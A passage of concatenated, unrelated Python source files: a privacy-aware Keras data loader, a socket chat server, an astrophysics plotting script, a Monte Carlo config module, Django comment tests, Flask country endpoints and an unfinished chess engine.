metrics=['accuracy'])
return model
class Purchases(Datasource):
"""
Some Helper Methods to prepare purchases100 Data
"""
def __init__(self, alternative_dataset=None):
"""
Retrieve purchases100 Data
"""
super().__init__()
print("load datasource purchases")
DATA = "./data/purchases/100/shokri_purchases_100_classes.npz"
if alternative_dataset is not None:
DATA = alternative_dataset
data = np.load(DATA, allow_pickle=True)
self.x = data['x']
self.y = data['y']
print("datasource data loaded")
def disjoint_dataset_indices(self, position, num_clients, seed):
"""
Get disjoint data sets for each party.
It is important to set the seed and the amount of clients for each party to the same value
otherwise it is not guaranteed that the sets are disjoint
"""
# Shokri uses 20k trainingsdata and 50k testdata for the central case. That means a proportion of 2/7
proportion = 5 / 7
np.random.seed(seed)
indices = np.random.choice(self.x.shape[0], size=self.x.shape[0], replace=False)
do_indices, ag_indices = train_test_split(indices, test_size=proportion)
if position == 0:
return ag_indices
batch_size = len(do_indices) // (num_clients - 1)
position = position - 1 # minus the aggregator
return do_indices[position * batch_size:(position + 1) * batch_size]
class PurchasesExperiment(Experiment):
"""
The purchases100 100 experiment
"""
def __init__(self, args):
self.args = args
super().__init__(self.get_optimizer(), Purchases(args["alternative_dataset"]),
lambda: GlobalModel_Purchases(args["output_size"]))
def get_optimizer(self):
optimizer = None
if self.args["noise_multiplier"] == 0:
loss = SparseCategoricalCrossentropy(from_logits=False)
optimizer = lambda: keras.optimizers.Adam(lr=self.args["learning_rate"])
else:
loss = SparseCategoricalCrossentropy(from_logits=False, reduction=tf.compat.v1.losses.Reduction.NONE)
optimizer = lambda: DPAdamGaussianOptimizer(learning_rate=self.args["learning_rate"],
l2_norm_clip=self.args["norm_clip"],
noise_multiplier=self.args["noise_multiplier"],
num_microbatches=self.args["batch_size"],
unroll_microbatches=True)
return {'loss': loss,
'optimizer': optimizer,
'metrics': ['accuracy']}
|
<filename>PythonBaseDemo/WINSOCKdemo/15.3/Senior/server/server_thread.py
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import CrazyitProtocol
def server_target(s, clients):
try:
while True:
# 从socket读取数据
line = s.recv(2048).decode('utf-8')
print(line)
# 如果读到的行以CrazyitProtocol.USER_ROUND开始,并以其结束
# 则可以确定读到的是用户登录的用户名
if line.startswith(CrazyitProtocol.USER_ROUND) \
and line.endswith(CrazyitProtocol.USER_ROUND):
# 得到真实消息
user_name = line[CrazyitProtocol.PROTOCOL_LEN: \
-CrazyitProtocol.PROTOCOL_LEN]
# 如果用户名重复
if user_name in clients:
print("重复")
s.send(CrazyitProtocol.NAME_REP.encode('utf-8'))
else:
print("成功")
s.send(CrazyitProtocol.LOGIN_SUCCESS.encode('utf-8'))
clients[user_name] = s
# 如果读到的行以CrazyitProtocol.PRIVATE_ROUND开始,并以其结束
# 则可以确定是私聊信息,私聊信息只向特定的socket发送
elif line.startswith(CrazyitProtocol.PRIVATE_ROUND) \
and line.endswith(CrazyitProtocol.PRIVATE_ROUND):
# 得到真实消息
user_and_msg = line[CrazyitProtocol.PROTOCOL_LEN: \
-CrazyitProtocol.PROTOCOL_LEN]
# 以SPLIT_SIGN分割字符串,前半是私聊用户,后半是聊天信息
user = user_and_msg.split(CrazyitProtocol.SPLIT_SIGN)[0]
msg = user_and_msg.split(CrazyitProtocol.SPLIT_SIGN)[1]
# 获取私聊用户对应的socket,并发送私聊信息
clients[user].send((clients.key_from_value(s) \
+ "悄悄地对你说:" + msg).encode('utf-8'))
# 公聊要向每个socket发送
else:
# 得到真实消息
msg = line[CrazyitProtocol.PROTOCOL_LEN: \
-CrazyitProtocol.PROTOCOL_LEN]
# 遍历clients中的每个socket
for client_socket in clients.values():
client_socket.send((clients.key_from_value(s) \
+ "说:" + msg).encode('utf-8'))
# 捕获到异常后,表明该socket对应的客户端已经出现了问题
# 所以程序将其对应的socket从dict中删除
except:
clients.remove_by_value(s)
print(len(clients))
# 关闭网络、IO资源
if s is not None:
s.close() |
<filename>starbursts/plots/mpl.smoothing_time.py<gh_stars>0
"""
Produces Fig. 2 of Johnson & Weinberg (2019), a 3-column by 2-row plot showing
the effect of outflow smoothing time on the 5-Gyr gas- and efficiency-driven
starburst models. Infall and star formation histories with SFE timescales are
shown in the left-hand panels, [O/Fe]-[Fe/H] tracks in the middle panels, and
stellar [O/Fe] distributions in the right-hand panels.
"""
import visuals # visuals.py -> matplotlib subroutines in this directory
import matplotlib.pyplot as plt
import vice
import sys
import warnings
warnings.filterwarnings("ignore")
def setup_axes():
"""
Sets up the 3x2 axis grid with the proper axis labels and ranges
Returns
=======
axes :: list
The axes, indexable via axes[row number][column number]
"""
axes = visuals.subplots(2, 3, figsize = (21, 14))
for i in range(2):
axes[i][0].xaxis.set_ticks([0, 2, 4, 6, 8, 10])
axes[i][0].set_xlim([-1, 11])
axes[i][1].set_xlim([-1.7, 0.2])
axes[i][1].set_ylim([-0.1, 0.5])
axes[i][2].set_xlim([-0.1, 0.5])
axes[i][2].set_ylim([0.2, 50])
axes[0][1].set_ylim([0.0, 0.5])
axes[0][2].set_xlim([0.0, 0.5])
axes[1].insert(1, visuals.append_subplot_below(axes[1][0]))
axes[0][0].set_ylim([-1, 15])
axes[1][0].set_ylim([-1, 7])
axes[1][1].set_ylim([0.8, 2.2])
visuals.set_labels_3axes(axes[0], "O")
visuals.set_labels_4axes(axes[1], "O")
return axes
def plot_gas_driven_models(axes):
"""
Plots the gas-driven starburst models on a set of axes
Parameters
==========
axes :: list
The 1-D list of matplotlib axis objects to plot on
"""
visuals.plot_output_3axes(axes,
"../../simulations/sudden_5Gyr_5e9Msun_ts0p5", "crimson", "O")
visuals.plot_output_3axes(axes,
"../../simulations/sudden_5Gyr_5e9Msun_ts1p0", "deepskyblue", "O")
visuals.plot_output_3axes(axes,
"../../simulations/sudden_5Gyr_5e9Msun", "black", "O",
second_linestyle = ':')
visuals.plot_track_points_intervals(axes[1],
vice.history("../../simulations/sudden_5Gyr_5e9Msun"))
def plot_eff_driven_models(axes):
"""
Plots the efficiency-driven starburst models on a set of axes
Parameters
==========
axes :: list
The 1-D list of matplotlib axis objects to plot on
"""
visuals.plot_output_4axes(axes,
"../../simulations/SFEdriven_5Gyr_ts0p5", "crimson", "O")
visuals.plot_output_4axes(axes,
"../../simulations/SFEdriven_5Gyr_ts1p0", "deepskyblue", "O")
visuals.plot_output_4axes(axes,
"../../simulations/SFEdriven_5Gyr", "black", "O",
second_linestyle = ':')
visuals.plot_track_points_intervals(axes[2],
vice.history("../../simulations/SFEdriven_5Gyr"))
def main():
"""
Produces the figure and saves it as a PDF.
"""
plt.clf()
axes = setup_axes()
plot_gas_driven_models(axes[0])
plot_eff_driven_models(axes[1])
visuals.sfr_ifr_legend(axes[0][0])
visuals.legend(axes[0][-1], ["black", "crimson", "deepskyblue"],
[r"$\tau_\text{s}$ = 0", r"$\tau_\text{s}$ = 0.5 Gyr",
r"$\tau_\text{s}$ = 1 Gyr"],
loc = "upper right", bbox_to_anchor = (0.99, 0.99))
for i in range(2):
visuals.yticklabel_formatter(axes[i][-1])
plt.tight_layout()
plt.subplots_adjust(right = 0.985)
plt.savefig(sys.argv[1])
plt.clf()
if __name__ == "__main__":
main()
|
<gh_stars>0
import typing as t
import warnings
import attr
from cached_property import cached_property
from phd_qmclib.constants import ER
from phd_qmclib.qmc_base import vmc as vmc_udf_base
from phd_qmclib.qmc_base.jastrow import SysConfDistType
from phd_qmclib.qmc_exec import (
exec_logger, proc as proc_base, vmc as vmc_exec
)
from phd_qmclib.qmc_exec.data.vmc import SamplingData
from phd_qmclib.util.attr import (
bool_converter, bool_validator, int_converter, int_validator,
opt_int_converter, opt_int_validator, opt_str_validator, str_validator
)
from .. import model, vmc as vmc_udf
# String to use a ModelSysConfSpec instance as input for a Proc instance.
MODEL_SYS_CONF_TYPE = 'MODEL_SYS_CONF'
model_spec_validator = attr.validators.instance_of(model.Spec)
opt_model_spec_validator = attr.validators.optional(model_spec_validator)
@attr.s(auto_attribs=True, frozen=True)
class ModelSysConfSpec(proc_base.ModelSysConfSpec):
"""Handler to build inputs from system configurations."""
#:
dist_type: str = attr.ib(validator=str_validator)
#:
num_sys_conf: t.Optional[int] = attr.ib(default=None,
validator=opt_int_validator)
#: A tag to identify this handler.
type: str = attr.ib(default=None, validator=opt_str_validator)
def __attrs_post_init__(self):
"""Post initialization stage."""
# This is the type tag, and must be fixed.
object.__setattr__(self, 'type', f'{MODEL_SYS_CONF_TYPE}')
@classmethod
def from_config(cls, config: t.Mapping):
"""
:param config:
:return:
"""
self_config = dict(config)
return cls(**self_config)
def dist_type_as_type(self) -> SysConfDistType:
"""
:return:
"""
dist_type = self.dist_type
if dist_type is None:
dist_type_enum = SysConfDistType.RANDOM
else:
if dist_type not in SysConfDistType.__members__:
raise ValueError
dist_type_enum = SysConfDistType[dist_type]
return dist_type_enum
@attr.s(auto_attribs=True, frozen=True)
class DensitySpec(proc_base.DensityEstSpec):
"""Density estimator basic config."""
num_bins: int = \
attr.ib(converter=int_converter, validator=int_validator)
@attr.s(auto_attribs=True, frozen=True)
class SSFEstSpec(proc_base.SSFEstSpec):
"""Structure factor estimator basic config."""
num_modes: int = \
attr.ib(converter=int_converter, validator=int_validator)
@attr.s(auto_attribs=True)
class ProcInput(vmc_exec.ProcInput):
"""Represents the input for the VMC calculation procedure."""
#: The state of the DMC procedure input.
state: vmc_udf_base.State
@classmethod
def from_model_sys_conf_spec(cls, sys_conf_spec: ModelSysConfSpec,
proc: 'Proc'):
"""
:param sys_conf_spec:
:param proc:
:return:
"""
model_spec = proc.model_spec
dist_type = sys_conf_spec.dist_type_as_type()
sys_conf = \
model_spec.init_get_sys_conf(dist_type=dist_type)
state = proc.sampling.build_state(sys_conf)
return cls(state)
@classmethod
def from_result(cls, proc_result: 'ProcResult',
proc: 'Proc'):
"""
:param proc_result:
:param proc:
:return:
"""
state = proc_result.state
assert proc.model_spec == proc_result.proc.model_spec
return cls(state)
class ProcInputError(ValueError):
"""Flags an invalid input for a DMC calculation procedure."""
pass
class ProcResult(proc_base.ProcResult):
"""Result of the VMC estimator sampling."""
#: The last state of the sampling.
state: vmc_udf_base.State
#: The sampling object used to generate the results.
proc: 'Proc'
#: The data generated during the sampling.
data: SamplingData
@attr.s(auto_attribs=True, frozen=True)
class ProcResult(proc_base.ProcResult):
"""Result of the DMC estimator sampling."""
#: The last state of the sampling.
state: vmc_udf_base.State
#: The sampling object used to generate the results.
proc: 'Proc'
#: The data generated during the sampling.
data: SamplingData
@attr.s(auto_attribs=True, frozen=True)
class Proc(vmc_exec.Proc):
"""VMC Sampling."""
model_spec: model.Spec = attr.ib(validator=model_spec_validator)
move_spread: float = attr.ib(converter=float)
rng_seed: t.Optional[int] = \
attr.ib(default=None, converter=opt_int_converter,
validator=opt_int_validator)
num_blocks: int = \
attr.ib(default=8, converter=int_converter, validator=int_validator)
num_steps_block: int = \
attr.ib(default=4096, converter=int_converter, validator=int_validator)
burn_in_blocks: t.Optional[int] = attr.ib(default=None,
converter=opt_int_converter,
validator=opt_int_validator)
keep_iter_data: bool = attr.ib(default=False,
converter=bool_converter,
validator=bool_validator)
# *** Estimators configuration ***
# TODO: add proper validator.
density_spec: t.Optional[DensitySpec] = \
attr.ib(default=None, validator=None)
ssf_spec: t.Optional[SSFEstSpec] = \
attr.ib(default=None, validator=None)
@classmethod
def from_config(cls, config: t.Mapping):
"""
:param config:
:return:
"""
self_config = dict(config)
# Add support for num_batches alias for num_blocks.
if 'num_batches' in self_config:
# WARNING ⚠⚠⚠
warnings.warn("num_batches attribute is deprecated, use "
"num_blocks instead", DeprecationWarning)
# WARNING ⚠⚠⚠
num_blocks = self_config.pop('num_batches')
self_config['num_blocks'] = num_blocks
# Add support for num_steps_batch alias for num_time_steps_block.
if 'num_steps_batch' in self_config:
# WARNING ⚠⚠⚠
warnings.warn("num_steps_batch attribute is deprecated, use "
"num_steps_block instead", DeprecationWarning)
# WARNING ⚠⚠⚠
nts_block = self_config.pop('num_steps_batch')
self_config['num_steps_block'] = nts_block
# Add support for burn_in_batches alias for burn_in_blocks.
if 'burn_in_batches' in self_config:
# WARNING ⚠⚠⚠
warnings.warn("burn_in_batches attribute is deprecated, use "
"burn_in_blocks instead", DeprecationWarning)
# WARNING ⚠⚠⚠
nts_block = self_config.pop('burn_in_batches')
self_config['burn_in_blocks'] = nts_block
# Extract the model spec.
model_spec_config = self_config.pop('model_spec')
model_spec = model.Spec(**model_spec_config)
# Extract the spec of the density.
# TODO: Implement density.
density_est_config = self_config.pop('density_spec', None)
if density_est_config is not None:
pass
# Extract the spec of the static structure factor.
ssf_est_config = self_config.pop('ssf_spec', None)
if ssf_est_config is not None:
ssf_est_spec = SSFEstSpec(**ssf_est_config)
else:
ssf_est_spec = None
return cls(model_spec=model_spec,
ssf_spec=ssf_est_spec,
**self_config)
def as_config(self):
"""Converts the procedure to a dictionary / mapping object."""
return attr.asdict(self, filter=attr.filters.exclude(type(None)))
@cached_property
def sampling(self) -> vmc_udf.Sampling:
"""
:return:
"""
if self.should_eval_ssf:
ssf_spec = self.ssf_spec
ssf_est_spec = vmc_udf.SSFEstSpec(ssf_spec.num_modes)
else:
ssf_est_spec = None
vmc_sampling = vmc_udf.Sampling(self.model_spec,
self.move_spread,
self.rng_seed,
ssf_est_spec=ssf_est_spec)
return vmc_sampling
def describe_model_spec(self):
"""
:return:
"""
model_spec = self.model_spec
v_zero = model_spec.lattice_depth
lr = model_spec.lattice_ratio
gn = model_spec.interaction_strength
nop = model_spec.boson_number
sc_size = model_spec.supercell_size
rm = model_spec.tbf_contact_cutoff
exec_logger.info('Multi-Rods system parameters:')
exec_logger.info(f'* Lattice depth: {v_zero / ER:.3G} ER')
exec_logger.info(f'* Lattice ratio: {lr:.3G}')
exec_logger.info(f'* Interaction strength: {gn / ER:.3G} ER')
exec_logger.info(f'* Number of bosons: {nop:d}')
exec_logger.info(f'* Supercell size: {sc_size:.3G} LKP')
exec_logger.info(f'* Variational parameters:')
exec_logger.info(f' * RM: {rm:.3G} LKP')
def build_result(self, state: vmc_udf_base.State,
data: SamplingData) -> ProcResult:
"""
:param state:
:param data:
:return:
"""
proc = self
return ProcResult(state, proc, data)
vmc_proc_validator = attr.validators.instance_of(Proc)
opt_vmc_proc_validator = attr.validators.optional(vmc_proc_validator)
|
<gh_stars>1-10
"""
Tests for :mod:`greenday_core.models.comment <greenday_core.models.comment>`
"""
from milkman.dairy import milkman
from django.utils import timezone
from ..models import (
User,
Project,
TimedVideoComment,
ProjectComment
)
from .base import AppengineTestBed
class TimedVideoCommentTestCase(AppengineTestBed):
"""
Tests for :class:`greenday_core.models.comment.TimedVideoComment <greenday_core.models.comment.TimedVideoComment>`
"""
def setUp(self):
"""
Bootstrap test data
"""
super(TimedVideoCommentTestCase, self).setUp()
self.project = milkman.deliver(Project)
self.video = self.create_video(project=self.project)
self.user1 = milkman.deliver(User, email="<EMAIL>")
self.user2 = milkman.deliver(User, email="<EMAIL>")
def test_add_reply(self):
"""
Add a reply to a comment
"""
with self.assertNumQueries(5):
root = TimedVideoComment.add_root(
video=self.video, text="foo", user=self.user1, start_seconds=0)
with self.assertNumQueries(5):
reply = root.add_reply("bar", self.user2)
# cannot reply to replies - we only allow a single level of comments
self.assertRaises(AssertionError, reply.add_reply, "baz", None)
def test_get_root_comments(self):
"""
Get all root comment threads for a video
"""
for i in range(0, 5):
(
TimedVideoComment.add_root(
video=self.video,
text="foo{0}".format(i),
user=self.user1,
start_seconds=0
).add_reply("baz{0}".format(i), user=self.user1)
)
# add some comments to another video
other_video = self.create_video(project=self.project)
for i in range(0, 5):
TimedVideoComment.add_root(
video=other_video,
text="bar{0}".format(i),
user=self.user1,
start_seconds=0)
with self.assertNumQueries(2):
video_comments = list(TimedVideoComment.get_root_comments_for(
self.video))
self.assertEqual(5, len(video_comments))
with self.assertNumQueries(2):
video_comments = TimedVideoComment.get_root_comments_for(
self.video, prefetch_replies=True)
self.assertEqual(5, len(video_comments))
def test_created_modified_updated(self):
"""
Check that created and modified dates are updated correctly
"""
# because these are quite important for comments
start = timezone.now()
root = TimedVideoComment.add_root(
video=self.video, text="foo", user=self.user1, start_seconds=0)
self.assertGreater(root.created, start)
self.assertGreater(root.modified, start)
created, modified = root.created, root.modified
root.save()
self.assertEqual(created, root.created)
self.assertGreater(root.modified, modified)
class ProjectCommentTestCase(AppengineTestBed):
"""
Tests for :class:`greenday_core.models.comment.ProjectComment <greenday_core.models.comment.ProjectComment>`
"""
def setUp(self):
"""
Bootstrap test data
"""
super(ProjectCommentTestCase, self).setUp()
self.project = milkman.deliver(Project)
self.user1 = milkman.deliver(User, email="<EMAIL>")
self.user2 = milkman.deliver(User, email="<EMAIL>")
def test_add_reply(self):
"""
Add a comment reply
"""
with self.assertNumQueries(5):
root = ProjectComment.add_root(
project=self.project, text="foo", user=self.user1)
with self.assertNumQueries(4):
reply = root.add_reply("bar", self.user2)
# cannot reply to replies - we only allow a single level of comments
self.assertRaises(AssertionError, reply.add_reply, "baz", None)
def test_get_root_comments(self):
"""
Get all root comment thread for a project
"""
for i in range(0, 5):
(
ProjectComment.add_root(
project=self.project,
text="foo{0}".format(i),
user=self.user1,
).add_reply("baz{0}".format(i), user=self.user1)
)
# add some comments to another project
other_project = milkman.deliver(Project)
for i in range(0, 5):
ProjectComment.add_root(
project=other_project,
text="bar{0}".format(i),
user=self.user1)
with self.assertNumQueries(1):
project_comments = list(ProjectComment.get_root_comments_for(
self.project))
self.assertEqual(5, len(project_comments))
with self.assertNumQueries(1):
project_comments = ProjectComment.get_root_comments_for(
self.project, prefetch_replies=True)
self.assertEqual(5, len(project_comments))
def test_created_modified_updated(self):
"""
Check that created and modified dates are updated correctly
"""
# because these are quite important for comments
start = timezone.now()
root = ProjectComment.add_root(
project=self.project, text="foo", user=self.user1)
self.assertGreater(root.created, start)
self.assertGreater(root.modified, start)
created, modified = root.created, root.modified
root.save()
self.assertEqual(created, root.created)
self.assertGreater(root.modified, modified)
|
<gh_stars>0
from pgs_api import app
from flask import request, jsonify
from pgs_api.models.plan import Plan
from pgs_api.models.plan import PlanService
from pgs_api.models.country import Country, CountryService
from pgs_api.extensions.jsonp import enable_jsonp
from pgs_api.extensions.error_handling import ErrorResponse
from pgs_api.extensions.error_handling import SuccessResponse
from flask_jwt import jwt_required, current_identity
import uuid
import mongoengine
import re
import pymongo
# --------------------------------------------------------------------------
# GET: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['GET'])
@jwt_required()
@enable_jsonp
def get_country_by_id(country_id):
try:
service = CountryService(country_id)
data = service.get_country()
if data:
return jsonify(data)
return ErrorResponse('Plan not found', 'The provided country_id is not valid').as_json()
except:
app.logger.error('Invalid json received for plan: %s', country_id)
return ErrorResponse('Could not get', 'Invalid data provided').as_json()
# --------------------------------------------------------------------------
# POST: /country
# --------------------------------------------------------------------------
# Registers a new plan in the system using pgs_api Identity Sub-System
@app.route('/api/v1/country', methods=['POST'])
@jwt_required()
@enable_jsonp
def post_country():
data = request.get_json()
if data:
try:
res = Country(
country_id=str(uuid.uuid4()),
name=data['name'],
)
res.save(validate=False)
app.logger.info('Country %s was created', res.country_id)
return SuccessResponse(res.country_id, 'Country created successfully', 'n/a').as_json()
except mongoengine.errors.NotUniqueError as e:
return ErrorResponse('Name is registred ',data['name']).as_json()
return ErrorResponse('Error processing request', 'The provided data country is not valid').as_json()
# --------------------------------------------------------------------------
# PUT: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['PUT'])
@jwt_required()
@enable_jsonp
def put_country(country_id):
try:
data = request.get_json()
service = CountryService(country_id)
plan = service.get_country()
if plan.update_country(data):
app.logger.info('Updated country_id: %s', country_id)
return SuccessResponse('Success', 'Updated successfully', 'UPDATE_OK').as_json()
except:
app.logger.error('Invalid json received for country: %s', country_id)
return ErrorResponse('Could not update', 'Invalid data provided').as_json()
# --------------------------------------------------------------------------
# PUT: /company/<uid>/status
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>/status', methods=['PUT'])
#@jwt_required()
@enable_jsonp
def update_country_status(country_id):
try:
service = CountryService(country_id)
plan = service.get_country()
if plan.update_status():
app.logger.info('Updated status for country_id: %s', country_id)
return SuccessResponse('Success', 'Status updated successfully', 'STATUS_OK').as_json()
except:
app.logger.error('Invalid json received for country: %s', country_id)
return ErrorResponse('Could not update status', 'Invalid status provided').as_json()
# --------------------------------------------------------------------------
# GET: /country/countries
# --------------------------------------------------------------------------
@app.route('/api/v1/country/countries/', defaults={'term':''}, methods=['GET'])
@app.route('/api/v1/country/countries/<term>', methods=['GET'])
#@jwt_required()
@enable_jsonp
def get_all_countries(term):
service = CountryService
data = service.get_countries(term)
if data:
return jsonify(data)
return ErrorResponse('Countries not found', 'Countries collections is empty').as_json()
# --------------------------------------------------------------------------
# DELETE: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['DELETE'])
@jwt_required()
@enable_jsonp
def delete_country(country_id):
try:
service = CountryService(country_id)
x = service.delete()
if x:
app.logger.info('Delete country_id: %s', country_id)
return SuccessResponse('Success', 'Delete successfully', 'DELETE_OK').as_json()
except:
app.logger.error('Invalid json received for company: %s', country_id)
return ErrorResponse('Could not delete country_id', 'Invalid country_id provided').as_json() |
<reponame>nilthehuman/Hex
import sys
import time
import copy
import math
from itertools import chain
COPY_COUNTER = 0
class Square:
x = -1
y = -1
def __init__(self, x, y):
self.x, self.y = x, y
#def __init__(self, algebraic):
# self.x, self.y = algebraic_to_square(algebraic[0], algebraic[1])
def __str__(self):
return square_to_algebraic(x, y)
def __neg__(self):
return Square(-self.x, -self.y)
def __add__(self, other):
return Square(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Square(self.x - other.x, self.y - other.y)
# more or less standard piece value heuristics
PIECE_VALUES = {
' ' : 0.0,
'P' : 1.0,
'N' : 3.0,
'B' : 3.25,
'R' : 5,
'Q' : 9.5,
'K' : 100
}
def piece_value(piece):
return PIECE_VALUES[piece.upper()]
# what the game looks like at the moment
# no castling, no en passant
class Position:
def reset(self):
self.board = []
self.color = ''
self.last_move = None
self.last_taken = None
self.optimal_move = None
self.score = None
def __init__(self, other=None):
if other is None:
self.reset()
else:
global COPY_COUNTER
COPY_COUNTER += 1
self.board = copy.deepcopy(other.board)
self.color = other.color
self.last_move = other.last_move
self.last_taken = other.last_taken
self.optimal_move = None
self.score = None
@classmethod
def from_fen(cls, fen, color):
pos = Position()
pos.color = color
for rank in fen.split('/'):
pos.board.append([])
for square in rank:
if square.isdigit():
for _ in range(int(square)):
pos.board[-1].append(' ')
else:
pos.board[-1].append(square)
return pos
def __str__(self):
rows = list(map(lambda x: ''.join(x), self.board))
show_board = '\n'.join(rows)
show_pos = show_board #+ "\nscore: %0.2f\noptimal_move: %s" % (self.score, move_to_algebraic(self.optimal_move))
return show_pos
def flip_color(self):
if self.color == 'w':
self.color = 'b'
else:
self.color = 'w'
def whose_man(self, square):
return whose_man(self.board[square.y][square.x], self.color)
def make_move(self, move):
# it is the caller's responsibility to provide a legal move!
sq_from, sq_to = move
self.last_move = move
self.last_taken = self.board[sq_to.y][sq_to.x]
# pawn promotion?
if self.board[sq_from.y][sq_from.x] == 'P' and sq_to.y == 0 or self.board[sq_from.y][sq_from.x] == 'p' and sq_to.y == 7:
self.board[sq_to.y][sq_to.x] = 'Q' if sq_to.y == 0 else 'q'
self.board[sq_from.y][sq_from.x] = ' '
else:
self.board[sq_to.y][sq_to.x] = self.board[sq_from.y][sq_from.x]
self.board[sq_from.y][sq_from.x] = ' '
self.flip_color()
def unmake_last_move(self):
sq_from, sq_to = self.last_move
if False:
# pawn unpromotion???
assert False
else:
self.board[sq_from.y][sq_from.x] = self.board[sq_to.y][sq_to.x]
self.board[sq_to.y][sq_to.x] = self.last_taken
self.last_move = None
self.last_taken = None
self.flip_color()
#### #### #### #### ####
def whose_man(piece, color):
if piece == ' ':
return 0
if piece.isupper():
return 1
else:
return -1
def turn_to_move(piece, color):
if piece == ' ':
return False
if piece.isupper() == (color == 'w'):
return True
else:
return False
def square_available_for_take(square, color):
x, y = square.x, square.y
if x < 0 or x > 7 or y < 0 or y > 7:
return False
if pos.board[y][x] == ' ':
return False
return pos.board[y][x].islower() == (color == 'w')
def square_available_for_quiet_move(square, color):
x, y = square.x, square.y
if x < 0 or x > 7 or y < 0 or y > 7:
return False
return pos.board[y][x] == ' '
def get_takes(pos, square):
return get_moves(pos, square, square_available_for_take, take=True)
def get_quiet_moves(pos, square):
return get_moves(pos, square, square_available_for_quiet_move, take=False)
def get_moves(pos, square, square_available, take):
moves = []
x, y = square.x, square.y
if pos.board[y][x] == ' ':
return []
# pawns are funky, define movement explicitly
elif pos.board[y][x] == 'p':
if take:
if x < 7 and pos.board[y+1][x+1].isupper():
# take to the left
moves.append((square, Square(x+1, y+1)))
if x > 0 and pos.board[y+1][x-1].isupper():
# take to the right
moves.append((square, Square(x-1, y+1)))
else:
if pos.board[y+1][x] == ' ':
# not blocked
moves.append((square, Square(x, y+1)))
if y == 1 and pos.board[y+2][x] == ' ':
# two squares from initial position
moves.append((square, Square(x, y+2)))
elif pos.board[y][x] == 'P':
if take:
if x > 0 and pos.board[y-1][x-1].islower():
# take to the left
moves.append((square, Square(x-1, y-1)))
if x < 7 and pos.board[y-1][x+1].islower():
# take to the right
moves.append((square, Square(x+1, y-1)))
else:
if pos.board[y-1][x] == ' ':
# not blocked
moves.append((square, Square(x, y-1)))
if y == 6 and pos.board[y-2][x] == ' ':
# two squares from initial position
moves.append((square, Square(x, y-2)))
# --- regular pieces ---
elif pos.board[y][x].upper() == 'N':
for dx in [-1, 1]:
for dy in [-2, 2]:
candidate_square = Square(x+dx, y+dy)
if square_available(candidate_square, pos.color):
moves.append((square, candidate_square))
for dx in [-2, 2]:
for dy in [-1, 1]:
candidate_square = Square(x+dx, y+dy)
if square_available(candidate_square, pos.color):
moves.append((square, candidate_square))
elif pos.board[y][x].upper() == 'B':
for delta in [Square(-1, -1), Square(-1, 1), Square(1, -1), Square(1, 1)]:
candidate_square = square + delta
while square_available_for_quiet_move(candidate_square, pos.color):
if not take:
moves.append((square, candidate_square))
candidate_square += delta
if square_available(candidate_square, pos.color):
moves.append((square, candidate_square))
elif pos.board[y][x].upper() == 'R':
for delta in [Square(0, -1), Square(-1, 0), Square(0, 1), Square(1, 0)]:
candidate_square = square + delta
while square_available_for_quiet_move(candidate_square, pos.color):
if not take:
moves.append((square, candidate_square))
candidate_square += delta
if square_available(candidate_square, pos.color):
moves.append((square, candidate_square))
elif pos.board[y][x].upper() == 'Q':
# a combination of B + R
orig_piece = pos.board[y][x]
pos.board[y][x] = 'B' if orig_piece.isupper() else 'b'
moves = get_moves(pos, square, square_available, take)
pos.board[y][x] = 'R' if orig_piece.isupper() else 'r'
moves += get_moves(pos, square, square_available, take)
pos.board[y][x] = orig_piece
elif pos.board[y][x].upper() == 'K':
for dx in range(-1, 2):
for dy in range(-1, 2):
candidate_square = Square(x+dx, y+dy)
if square_available(candidate_square, pos.color):
moves.append((square, candidate_square))
else:
assert False
return moves
#### #### #### #### ####
def gen_all_moves(pos, take=False):
for y in range(8):
for x in range(8):
if turn_to_move(pos.board[y][x], pos.color):
if take:
takes = get_takes(pos, Square(x, y))
for t in takes:
yield t
else:
moves = get_quiet_moves(pos, Square(x, y))
for m in moves:
yield m
def minimax(pos, alpha, beta, depth): # depth is in plies
if depth < 1:
# call heuristic evaluation
pos.score = score(pos)
#print(pos, file=sys.stderr, flush=True)
return pos
# zugzwang does not exist, so a move can only improve the position
optimal_move = None
optimal_score = alpha if pos.color == 'w' else beta
opt = max if pos.color == 'w' else min
# avoid copying the entire board array every time
new_pos = Position(pos)
all_moves = chain(gen_all_moves(pos, take=True), gen_all_moves(pos, take=False))
for move in all_moves:
new_pos.make_move(move)
new_score = opt(optimal_score, minimax(new_pos, alpha, beta, depth-1).score)
# improvement?
if pos.color == 'w' and optimal_score < new_score:
optimal_move = move
optimal_score = new_score
alpha = max(alpha, new_score)
elif pos.color == 'b' and optimal_score > new_score:
optimal_move = move
optimal_score = new_score
beta = min(beta, new_score)
if alpha > beta:
break
new_pos.unmake_last_move()
pos.optimal_move = optimal_move
pos.score = optimal_score
return pos
def test_minimax():
pos = Position()
pos.board = [[' ', ' ']]
pass
#### #### #### #### ####
def first_move(pos):
bishops = []
for y in range(8):
for x in range(8):
if (pos.board[y][x] == 'B' and pos.color == 'w' or
pos.board[y][x] == 'b' and pos.color == 'b'):
bishops.append(Square(x, y))
candidates = []
for b in bishops:
dx = 1 if b.x < 4 else -1
y = 6 if pos.color == 'w' else 1
new_y = 5 if pos.color == 'w' else 2
candidates.append((Square(b.x+dx, y), Square(b.x+dx, new_y)))
if pos.color == 'w':
return candidates[0]
candidate_positions = []
for c in candidates:
pos.make_move(c)
candidate_positions.append(Position(pos))
pos.unmake_last_move()
opt = max if pos.color == 'w' else min
return opt(candidate_positions, key=lambda c: minimax(Position(), -1000, 1000, 1).score)
#### #### #### #### ####
def algebraic_to_square(algebraic):
file, rank = algebraic[0], algebraic[1]
x = ord(file) - ord('a')
y = ord('8') - ord(rank)
return (x, y)
def square_to_algebraic(x, y):
rank = chr(ord('8') - y)
file = chr(ord('a') + x)
return file + rank
def move_to_algebraic(move):
if move is None:
return None
sq_from = square_to_algebraic(move[0].x, move[0].y)
sq_to = square_to_algebraic(move[1].x, move[1].y)
return sq_from + sq_to
def score_material(pos):
sum = 0
